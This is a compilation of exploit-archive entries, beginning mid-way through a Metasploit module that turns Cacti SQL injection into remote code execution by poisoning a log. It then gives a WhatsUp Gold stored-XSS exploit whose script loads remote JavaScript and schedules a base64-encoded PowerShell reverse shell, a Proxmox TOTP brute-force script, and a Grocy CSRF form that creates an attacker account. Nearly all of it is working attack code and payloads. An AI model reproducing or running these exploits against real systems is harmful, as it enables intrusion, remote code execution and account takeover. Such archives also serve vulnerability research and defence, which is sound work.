it is vulnerable to SQLi    print_status('Attempting SQLi to check if the target is vulnerable')    return CheckCode::Safe('Blind SQL injection test failed') unless sqli.test_vulnerable    CheckCode::Vulnerable  end  def get_ext_link_id    # Get an unused External Link ID with a time-based SQLi    @ext_link_id = rand(1000..9999)    loop do      _res, elapsed_time = Rex::Stopwatch.elapsed_time do        sqli.raw_run_sql("if(id,sleep(#{datastore['SqliDelay']}),null) from external_links where id=#{@ext_link_id}")      end      break if elapsed_time < datastore['SqliDelay']      @ext_link_id = rand(1000..9999)    end    vprint_good("Got external link ID #{@ext_link_id}")  end  def exploit    # `#do_login` will take care of populating `@csrf_token` and `@cacti_version`    unless @logged_in      begin        do_login      rescue CactiError => e        fail_with(Failure::NoAccess, "Login failure: #{e}")      end    end    @log_file_path = "log/cacti#{rand(1..999)}.log"    print_status("Backing up the current log file path and adding a new path (#{@log_file_path}) to the `settings` table")    @log_setting_name_bak = '_path_cactilog'    sqli.raw_run_sql(";update settings set name='#{@log_setting_name_bak}' where name='path_cactilog'")    @do_settings_cleanup = true    sqli.raw_run_sql(";insert into settings (name,value) values ('path_cactilog','#{@log_file_path}')")    register_file_for_cleanup(@log_file_path)    print_status("Inserting the log file path `#{@log_file_path}` to the external links table")    log_file_path_lfi = "../../#{@log_file_path}"    # Some specific path tarversal needs to be prepended to bypass the v1.2.25 fix in `link.php` (line 79):    #   $file = $config['base_path'] . "/include/content/" . str_replace('../', '', $page['contentfile']);    log_file_path_lfi = "....//....//#{@log_file_path}" if @cacti_version && Rex::Version.new(@cacti_version) == Rex::Version.new('1.2.25')    get_ext_link_id    sqli.raw_run_sql(";insert into external_links (id,sortorder,enabled,contentfile,title,style) values (#{@ext_link_id},2,'on','#{log_file_path_lfi}','Log-#{rand_text_numeric(3..5)}','CONSOLE')")    @do_ext_link_cleanup = true    print_status('Getting the user ID and setting permissions (it might take a few minutes)')    user_id = sqli.run_sql("select id from user_auth where username='#{datastore['USERNAME']}'")    fail_with(Failure::NotFound, 'User ID not found') unless user_id =~ (/\A\d+\Z/)    sqli.raw_run_sql(";insert into user_auth_realm (realm_id,user_id) values (#{10000 + @ext_link_id},#{user_id})")    @do_perms_cleanup = true    print_status('Logging in again to apply new settings and permissions')    # Keep a copy of the cookie_jar and the CSRF token to be used later by the cleanup routine and remove all cookies to login again.    # This is required since this new session will block after triggering the payload and we won't be able to reuse it to cleanup.    cookie_jar_bak = cookie_jar.clone    cookie_jar.clear    csrf_token_bak = @csrf_token    # Setting `@csrf_token` to nil will force `#do_login` to get a fresh CSRF token    @csrf_token = nil    begin      do_login    rescue CactiError => e      fail_with(Failure::NoAccess, "Login failure: #{e}")    end    print_status('Poisoning the log')    header_name = rand_text_alpha(1).upcase    sqli.raw_run_sql(" and updatexml(rand(),concat(CHAR(60),'?=system($_SERVER[\\'HTTP_#{header_name}\\']);?>',CHAR(126)),null)")    print_status('Triggering the payload')    # Expecting no response    send_request_cgi({      'uri' => normalize_uri(target_uri.path, 'link.php'),      'method' => 'GET',      'keep_cookies' => true,      'headers' => {        header_name => payload.encoded      },      'vars_get' => {        'id' => @ext_link_id,        'headercontent' => 'true'      }    }, 0)    # Restore the cookie_jar and the CSRF token to run cleanup without being blocked    cookie_jar.clear    self.cookie_jar = cookie_jar_bak    @csrf_token = csrf_token_bak  end  def cleanup    super    if @do_ext_link_cleanup      print_status('Cleaning up external link using SQLi')      sqli.raw_run_sql(";delete from external_links where id=#{@ext_link_id}")    end    if @do_perms_cleanup      print_status('Cleaning up permissions using SQLi')      sqli.raw_run_sql(";delete from user_auth_realm where realm_id=#{10000 + @ext_link_id}")    end    if @do_settings_cleanup      print_status('Cleaning up the log path in `settings` table using SQLi')      sqli.raw_run_sql(";delete from settings where name='path_cactilog' and value='#{@log_file_path}'")      sqli.raw_run_sql(";update settings set name='path_cactilog' where name='#{@log_setting_name_bak}'")    end  endend

Cacti pollers.php SQL Injection / Remote Code Execution

WhatsUp Gold 2022 version 22.1.0 Build 39 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: WhatsUpGold 22.1.0 - Stored Cross-Site Scripting (XSS)# Date: April 18, 2023# Exploit Author: Andreas Finstad (4ndr34z)# Vendor Homepage: https://www.whatsupgold.com# Version: v.22.1.0 Build 39# Tested on: Windows 2022 Server# CVE : CVE-2023-35759# Reference: https://nvd.nist.gov/vuln/detail/CVE-2023-35759WhatsUp Gold 2022 (22.1.0 Build 39) Stored XSS in sysName SNMP parameter.Vulnerability Report: Stored XSS in WhatsUp Gold 2022 (22.1.0 Build 39)Product Name: WhatsUp Gold 2022Version: 22.1.0 Build 39Vulnerability Type: Stored Cross-Site Scripting (XSS)Description:WhatsUp Gold 2022 is vulnerable to a stored cross-site scripting (XSS) attack that allows an attacker to inject malicious scripts into the admin console. The vulnerability exists in the sysName SNMP field on a device, which reflects the input from the SNMP device into the admin console after being discovered by SNMP. An attacker can exploit this vulnerability by crafting a specially crafted SNMP device name that contains malicious code. Once the device name is saved and reflected in the admin console, the injected code will execute in the context of the admin user, potentially allowing the attacker to steal sensitive data or perform unauthorized actions.As there is no CSRF tokens or CDP, it is trivial to create a javascript payload that adds an scheduled action on the server, that executes code as "NT System". In my POC code, I add a Powershell revshell that connects out to the attacker every 5 minutes. (screenshot3)The XSS trigger when clicking the "All names and addresses"Stage:Base64 encoded id property:var a=document.createElement("script");a.src="https://f20.be/t.js";document.body.appendChild(a);Staged payload placed in the SNMP sysName Field on a device:<img id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vZjIwLmJlL3QuanMiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7Cg== src=https://f20.be/1 onload=eval(atob(this.id))>payload:var vhost = window.location.protocol+'\/\/'+window.location.hostaddaction();async function addaction() {var arguments = ''let run = fetch(vhost+'/NmConsole/api/core/WugPowerShellScriptAction?_dc=1655327281064',{    method: 'POST',    headers: {        'Connection': 'close',        'Content-Length': '1902',        'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="102", "Microsoft Edge";v="102"',        'Accept': 'application/json',        'Content-Type': 'application/json',        'X-Requested-With': 'XMLHttpRequest',        'sec-ch-ua-mobile': '?0',        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.33',        'sec-ch-ua-platform': '"macOS"',        'Sec-Fetch-Mode': 'cors',        'Sec-Fetch-Dest': 'empty',        'Accept-Encoding': 'gzip, deflate',        'Accept-Language': 'nb,no;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,sv;q=0.5,fr;q=0.4'    },    credentials: 'include',    body: '{"id":-1,"Timeout":30,"ScriptText":"Start-process powershell -argumentlist \\"-W Hidden -noprofile -executionpolicy bypass -NoExit -e JAB0AG0AcAAgAD0AIABAACgAJwBzAFkAUwB0AGUATQAuAG4ARQB0AC4AcwBPAGMAJwAsACcASwBFAHQAcwAuAHQAQwBQAEMAbABJAGUAbgB0ACcAKQA7ACQAdABtAHAAMgAgAD0AIABbAFMAdAByAGkAbgBnAF0AOgA6AEoAbwBpAG4AKAAnACcALAAkAHQAbQBwACkAOwAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAkAHQAbQBwADIAKAAnADEAOQAyAC4AMQA2ADgALgAxADYALgAzADUAJwAsADQANAA0ADQAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACgAJABlAG4AdgA6AFUAcwBlAHIATgBhAG0AZQApACAAKwAgACcAQAAnACAAKwAgACgAJABlAG4AdgA6AFUAcwBlAHIARABvAG0AYQBpAG4AKQAgACsAIAAoAFsAUwB5AHMAdABlAG0ALgBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoATgBlAHcATABpAG4AZQApACAAKwAgACgAZwBlAHQALQBsAG8AYwBhAHQAaQBvAG4AKQArACcAPgAnADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==\\" -NoNewWindow","ScriptImpersonateFlag":false,"ClsId":"5903a09a-cce6-11e0-8f66-fe544824019b","Description":"Evil script","Name":"Systemtask"}'});setTimeout(() => { getactions(); }, 1000);};async function getactions() {const response = await fetch(vhost+'/NmConsole/api/core/WugAction?_dc=4',{    method: 'GET',    headers: {        'Connection': 'close',         'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="102", "Microsoft Edge";v="102"',         'Accept': 'application/json',         'Content-Type': 'application/json',         'X-Requested-With': 'XMLHttpRequest',         'sec-ch-ua-mobile': '?0',         'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.33',         'sec-ch-ua-platform': '"macOS"',         'Sec-Fetch-Site': 'same-origin',         'Sec-Fetch-Mode': 'cors',         'Sec-Fetch-Dest': 'empty',         'Accept-Encoding': 'gzip, deflate',         'Accept-Language': 'nb,no;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,sv;q=0.5,fr;q=0.4'    },    credentials: 'include'   });const actions = await response.json();var results = [];var searchField = "Name";var searchVal = "Systemtask";for (var i=0 ; i < actions.length ; i++){    if (actions[i][searchField] == searchVal) {        results.push(actions[i].Id);        revshell(results[0])           }}//console.log(actions);};async function revshell(ID) {fetch(vhost+'/NmConsole/Configuration/DlgRecurringActionLibrary/DlgSchedule/DlgSchedule.asp',{    method: 'POST',    headers: {        'Connection': 'close',        'Content-Length': '2442',        'Cache-Control': 'max-age=0',        'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="102", "Microsoft Edge";v="102"',        'sec-ch-ua-mobile': '?0',        'sec-ch-ua-platform': '"macOS"',        'Upgrade-Insecure-Requests': '1',        'Origin': 'https://192.168.16.100',        'Content-Type': 'application/x-www-form-urlencoded',        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.33',        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',        'Sec-Fetch-Site': 'same-origin',        'Sec-Fetch-Mode': 'navigate',        'Sec-Fetch-User': '?1',        'Sec-Fetch-Dest': 'iframe',        'Referer': 'https://192.168.16.100/NmConsole/Configuration/DlgRecurringActionLibrary/DlgSchedule/DlgSchedule.asp',        'Accept-Encoding': 'gzip, deflate',        'Accept-Language': 'nb,no;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,sv;q=0.5,fr;q=0.4'    },    credentials: 'include',    body: 'DlgSchedule.oCheckBoxEnableSchedule=on&DlgSchedule.ScheduleType=DlgSchedule.oRadioButtonInterval&DlgSchedule.oEditIntervalMinutes=5&ShowAspFormDialog.VISITEDFORM=visited&DlgRecurringActionGeneral.oEditName=test&DlgRecurringActionGeneral.oComboSelectActionType=21&DlgRecurringActionGeneral.DIALOGRETURNURL=%2FNmConsole%2F%24Nm%2FCore%2FForm-AspForms%2Finc%2FShowAspFormDialog.asp&DlgRecurringActionGeneral.SAVEDFORMSTATE=%253cSavedFormState%253e%253cFormVariables%253e%253coElement%2520sName%3D%2522__VIEWSTATE%2522%2520sValue%3D%2522%25253cViewState%2F%25253e%0D%0A%2522%2F%253e%253c%2FFormVariables%253e%253cQueryStringVariables%2F%253e%253c%2FSavedFormState%253e&DlgRecurringActionGeneral.VISITEDFORM=visited%2C+visited&DlgSchedule.DIALOGRETURNURL=%2FNmConsole%2F%24Nm%2FCore%2FForm-AspForms%2Finc%2FShowAspFormDialog.asp&DlgSchedule.SAVEDFORMSTATE=%253cSavedFormState%253e%253cFormVariables%253e%253coElement%2520sName%3D%2522__VIEWSTATE%2522%2520sValue%3D%2522%25253cViewState%2F%25253e%0D%0A%2522%2F%253e%253c%2FFormVariables%253e%253cQueryStringVariables%2F%253e%253c%2FSavedFormState%253e&__EVENTTYPE=ButtonPressed&__EVENTTARGET=DlgSchedule.oButtonFinish&__EVENTARGUMENT=&DlgSchedule.VISITEDFORM=visited&__SOURCEFORM=DlgSchedule&__VIEWSTATE=%253cViewState%253e%253coElement%2520sName%3D%2522DlgRecurringActionGeneral.RecurringAction-sMode%2522%2520sValue%3D%2522new%2522%2F%253e%253coElement%2520sName%3D%2522RecurringAction-nActionTypeID%2522%2520sValue%3D%2522'+ID+'%2522%2F%253e%253coElement%2520sName%3D%2522Date_nStartOfWeek%2522%2520sValue%3D%25220%2522%2F%253e%253coElement%2520sName%3D%2522Date_sMediumDateFormat%2522%2520sValue%3D%2522MMMM%2520dd%2C%2520yyyy%2522%2F%253e%253coElement%2520sName%3D%2522DlgSchedule.sWebUserName%2522%2520sValue%3D%2522admin%2522%2F%253e%253coElement%2520sName%3D%2522DlgRecurringActionGeneral.sWebUserName%2522%2520sValue%3D%2522admin%2522%2F%253e%253coElement%2520sName%3D%2522DlgSchedule.RecurringAction-sMode%2522%2520sValue%3D%2522new%2522%2F%253e%253coElement%2520sName%3D%2522RecurringAction-sName%2522%2520sValue%3D%2522test%2522%2F%253e%253coElement%2520sName%3D%2522Date_bIs24HourTime%2522%2520sValue%3D%25220%2522%2F%253e%253c%2FViewState%253e%0D%0A&DlgSchedule.oEditDay=&DlgSchedule.oComboSelectMonthHour=0&DlgSchedule.oComboSelectMonthMinute=0&DlgSchedule.oComboSelectMonthAmPm=0&DlgSchedule.oComboSelectWeekHour=0&DlgSchedule.oComboSelectWeekMinute=0&DlgSchedule.oComboSelectWeekAmPm=0'});};

WhatsUp Gold 2022 22.1.0 Build 39 Cross Site Scripting

Proxmox VE versions 5.4 through 7.4-1 suffer from a TOTP brute forcing vulnerability.

    # Exploit Title: Proxmox VE TOTP Brute Force# Date: 09/23/2023# Exploit Author: Cory Cline, Gabe Rust# Vendor Homepage: https://www.proxmox.com/en/# Software Link: http://download.proxmox.com/iso/# Version: 5.4 - 7.4-1# Tested on: Debian# CVE : CVE-2023-43320import timeimport requestsimport urllib.parseimport jsonimport osimport urllib3urllib3.disable_warnings()threads=25#################### REPLACE THESE VALUES #########################password="KNOWN PASSWORD HERE"username="KNOWN USERNAME HERE"target_url="https://HOST:PORT"##################################################################ticket=""ticket_username=""CSRFPreventionToken=""ticket_data={}auto_refresh_time = 20 # in minutes - 30 minutes before expirationlast_refresh_time = 0tokens = [];for num in range(0,1000000):    tokens.append(str(num).zfill(6))def refresh_ticket(target_url, username, password):    global CSRFPreventionToken    global ticket_username    global ticket_data    refresh_ticket_url = target_url + "/api2/extjs/access/ticket"    refresh_ticket_cookies = {}    refresh_ticket_headers = {}    refresh_ticket_data = {"username": username, "password": password, "realm": "pve", "new-format": "1"}    ticket_data_raw = urllib.parse.unquote(requests.post(refresh_ticket_url, headers=refresh_ticket_headers, cookies=refresh_ticket_cookies, data=refresh_ticket_data, verify=False).text)    ticket_data = json.loads(ticket_data_raw)    CSRFPreventionToken = ticket_data["data"]["CSRFPreventionToken"]    ticket_username = ticket_data["data"]["username"]def attack(token):    global last_refresh_time    global auto_refresh_time    global target_url    global username    global password    global ticket_username    global ticket_data    if ( int(time.time()) > (last_refresh_time + (auto_refresh_time * 60)) ):        refresh_ticket(target_url, username, password)        last_refresh_time = int(time.time())    url = target_url + "/api2/extjs/access/ticket"    cookies = {}    headers = {"Csrfpreventiontoken": CSRFPreventionToken}    stage_1_ticket = str(json.dumps(ticket_data["data"]["ticket"]))[1:-1]    stage_2_ticket = stage_1_ticket.replace('\\"totp\\":', '\"totp\"%3A').replace('\\"recovery\\":', '\"recovery\"%3A')    data = {"username": ticket_username, "tfa-challenge": stage_2_ticket, "password": "totp:" + str(token)}    response = requests.post(url, headers=headers, cookies=cookies, data=data, verify=False)    if(len(response.text) > 350):        print(response.text)        os._exit(1)while(1):    refresh_ticket(target_url, username, password)    last_refresh_time = int(time.time())    with concurrent.futures.ThreadPoolExecutor(max_workers=threads) as executor:        res = [executor.submit(attack, token) for token in tokens]        concurrent.futures.wait(res)

Proxmox VE 7.4-1 TOTP Brute Force

Grocy versions 4.0.2 and below suffer from a cross site request forgery vulnerabilities.

    # Exploit Title: Grocy <= 4.0.2 CSRF Vulnerability# Application: Grocy# Version: <= 4.0.2# Date: 09/21/2023# Exploit Author: Chance Proctor# Vendor Homepage: https://grocy.info/# Software Link: https://github.com/grocy/grocy# Tested on: Linux# CVE : CVE-2023-42270Overview==================================================When creating a new user in Grocy 4.0.2, the new user request is made using JSON formatting.This makes it easy to adjust your request since it is a known format. There is also no CSRF Token or other methods of verification in place to verify where the request is coming from.This allows for html code to generate a new user as long as the target is logged in and has Create User Permissions.Proof of Concept==================================================Host the following html code via a XSS or delivery via a phishing campaign:  <html>  <form action="/api/users" method="post" enctype="application/x-www-form-urlencoded">  <input name='username' value='hacker' type='hidden'>  <input name='password' value='test' type='hidden'>  <input type=submit>  </form>  <script>  history.pushState('','', '/');  document.forms[0].submit();  </script>  </html>If a user is logged into the Grocy Webapp at time of execution, a new user will be created in the app with the following credentials  Username: hacker  Password: testNote:In order for this to work, the target must have Create User Permissions.This is enabled by default.Proof of Exploit/Reproduce==================================================http://xploit.sh/posts/cve-2023-42270/

Grocy 4.0.2 Cross Site Request Forgery

Cross-Site Request Forgery (CSRF) vulnerability in livewire before v3.0.4, allows remote attackers to execute arbitrary code getCsrfToken function.

**livewire Cross-Site Request Forgery vulnerability**

Moderate severity GitHub Reviewed Published Feb 1, 2024 to the GitHub Advisory Database • Updated Feb 1, 2024

Tag

#csrf